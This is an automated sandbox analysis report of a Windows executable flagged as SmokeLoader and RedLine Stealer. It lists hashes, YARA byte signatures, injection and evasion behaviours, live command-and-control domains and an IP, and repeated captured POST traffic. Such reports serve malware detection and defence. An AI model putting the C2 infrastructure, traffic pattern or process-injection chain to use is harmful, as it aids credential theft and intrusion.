Edit tour

Windows Analysis Report
ikNC1JE7rY.exe

Overview

General Information

Sample Name:	ikNC1JE7rY.exe
Analysis ID:	713054
MD5:	44f5530502db25e5e66c15260ec4d25c
SHA1:	ede93f48f848e0b70c6b883087923ea83f74e9d8
SHA256:	4b952ac0a783e889a32e9528591e64eb51d41095b251c23c9763b3c8db973690
Tags:	exeRedLineStealer
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Machine Learning detection for sample

Injects a PE file into a foreign processes

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Contains functionality to inject code into remote processes

Deletes itself after installation

Machine Learning detection for dropped file

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

ikNC1JE7rY.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\ikNC1JE7rY.exe" MD5: 44F5530502DB25E5E66C15260EC4D25C)

ikNC1JE7rY.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\ikNC1JE7rY.exe" MD5: 44F5530502DB25E5E66C15260EC4D25C)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

sifdvgf (PID: 2368 cmdline: C:\Users\user\AppData\Roaming\sifdvgf MD5: 44F5530502DB25E5E66C15260EC4D25C)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4f8c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5154:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.ikNC1JE7rY.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
10.0.ikNC1JE7rY.exe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.sifdvgf.4515a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
10.0.ikNC1JE7rY.exe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
10.0.ikNC1JE7rY.exe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ikNC1JE7rY.exe	ReversingLabs: Detection: 72%
Source: ikNC1JE7rY.exe	Virustotal: Detection: 38%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\sifdvgf

ReversingLabs: Detection: 72%

Machine Learning detection for sample

Source: ikNC1JE7rY.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\sifdvgf

Joe Sandbox ML: detected

Source: 10.0.ikNC1JE7rY.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.ikNC1JE7rY.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.ikNC1JE7rY.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.ikNC1JE7rY.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: ikNC1JE7rY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: *C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr
Source:	Binary string: C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

Source: Joe Sandbox View

ASN Name: GULFSTREAMUA GULFSTREAMUA

Source: Joe Sandbox View

IP Address: 176.124.192.17 176.124.192.17

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!

Source: explorer.exe, 0000000B.00000000.342540807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.372565994.000000000F270000.00000004.00000001.00020000.00000000.sdmp

String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.com

Source: unknown

DNS traffic detected: queries for: host-file-host6.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 10.2.ikNC1JE7rY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.sifdvgf.4515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: sifdvgf, 0000000C.00000002.515577370.00000000006DA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: ikNC1JE7rY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0040E07E	0_2_0040E07E
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00413928	0_2_00413928
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00413E6C	0_2_00413E6C
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00414AA8	0_2_00414AA8
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0041730C	0_2_0041730C
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0040FBC1	0_2_0040FBC1
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_004143B0	0_2_004143B0
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0040E07E	12_2_0040E07E
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_00413928	12_2_00413928
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_00413E6C	12_2_00413E6C
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_00414AA8	12_2_00414AA8
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0041730C	12_2_0041730C
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0040FBC1	12_2_0040FBC1
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_004143B0	12_2_004143B0

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: String function: 0040C128 appears 42 times
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: String function: 0040C128 appears 42 times

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00520110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	0_2_00520110
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_0040180C Sleep,NtTerminateProcess,	10_2_0040180C
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_00401818 Sleep,NtTerminateProcess,	10_2_00401818
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_00401822 Sleep,NtTerminateProcess,	10_2_00401822
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_00401826 Sleep,NtTerminateProcess,	10_2_00401826
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_00401834 Sleep,NtTerminateProcess,	10_2_00401834

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: ikNC1JE7rY.exe	ReversingLabs: Detection: 72%
Source: ikNC1JE7rY.exe	Virustotal: Detection: 38%

Source: ikNC1JE7rY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe"
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Process created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sifdvgf C:\Users\user\AppData\Roaming\sifdvgf
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Process created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sifdvgf

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/2@4/1

Source: ikNC1JE7rY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ikNC1JE7rY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ikNC1JE7rY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ikNC1JE7rY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ikNC1JE7rY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ikNC1JE7rY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ikNC1JE7rY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: *C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr
Source:	Binary string: C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0040548C pushad ; retf	0_2_004054AD
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00407168 push eax; ret	0_2_00407186
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0040C16D push ecx; ret	0_2_0040C180
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00521970 push ebx; iretd	0_2_005219B7
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00521977 push ebx; iretd	0_2_005219B7
